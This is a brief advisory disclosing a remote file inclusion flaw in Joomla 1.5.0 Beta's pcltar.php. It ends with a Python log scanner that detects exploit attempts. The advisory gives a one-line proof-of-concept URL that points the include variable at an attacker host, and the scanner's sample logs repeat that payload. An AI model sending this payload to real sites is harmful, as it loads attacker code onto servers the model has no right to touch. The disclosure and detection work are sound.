
Joomla 1.5.0 Beta remote file include
Remote file inclusion in Joomla 1.5.0 Beta



Hi,
Joomla! 1.5.0 is in Beta version and "should NOT to be used for `live`
or `production` sites."
Joomla 1.0.12 has good security but it seems that Joomla 1.5.0 doesn't
have a good security approach. Anyway, there is a remote file inclusion
in Joomla 1.5.0 Beta:

File /libraries/pcl/pcltar.php, Line 74 :
  if (!defined("PCLERROR_LIB"))
  {
	include($g_pcltar_lib_dir."/pclerror.lib.".$g_pcltar_extension);
  }

POC : http://hacked/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://hacker/? 

The original advisory (in Persian) is located at:
http://www.hackers.ir/advisories/joomla.html 


- Omid
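
A defender's check for this issue, as an added example that is not part of the original advisory: it scans web access logs for requests that set the include variables of pcltar.php from the query string. The log lines, host names and IP addresses are constructed, and the "review" tier for URL-valued parameters on other .php scripts is a generalization beyond the advisory.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script path and variable names come from the advisory's include() line.
VULN_PATH = "/libraries/pcl/pcltar.php"
INCLUDE_VARS = {"g_pcltar_lib_dir", "g_pcltar_extension"}
# Value prefixes that PHP stream wrappers treat as remote or injected content.
REMOTE_SCHEME = re.compile(r"^\s*(?:(?:https?|ftps?|php)://|data:)", re.I)
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')

# Constructed sample lines (common log format); every host and IP is a placeholder.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2007:10:00:00 +0000] "GET /index.php?option=com_content&id=3 HTTP/1.1" 200 5120
192.0.2.44 - - [01/Jan/2007:10:00:05 +0000] "GET /libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://example.invalid/? HTTP/1.1" 200 312
192.0.2.44 - - [01/Jan/2007:10:00:09 +0000] "GET /libraries/pcl/pcltar.php?g_pcltar_lib_dir=hTTp%3A%2F%2Fexample.invalid%2F%3F HTTP/1.1" 200 312
192.0.2.17 - - [01/Jan/2007:10:01:00 +0000] "GET /index.php?return=http://example.invalid/home HTTP/1.1" 200 800
192.0.2.90 - - [01/Jan/2007:10:02:00 +0000] "GET /libraries/pcl/pcltar.php HTTP/1.1" 200 0
"""

def classify(target):
    """Return (severity, param, decoded_value) tuples for one request target."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if path.endswith(VULN_PATH) and name in INCLUDE_VARS:
            # No legitimate client ever supplies the library's include variables.
            hits.append(("high", name, value))
        elif path.endswith(".php") and REMOTE_SCHEME.match(value):
            # URL-valued parameter on another script: may be benign, needs a look.
            hits.append(("review", name, value))
    return hits

def scan(log_text):
    """Parse access-log text and collect findings with client IP and status."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        for severity, param, value in classify(target):
            findings.append({"client": client, "severity": severity,
                             "param": param, "value": value, "status": int(status)})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs normally record only the query string, so the same variable supplied in a POST body or cookie would not be visible to this check.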
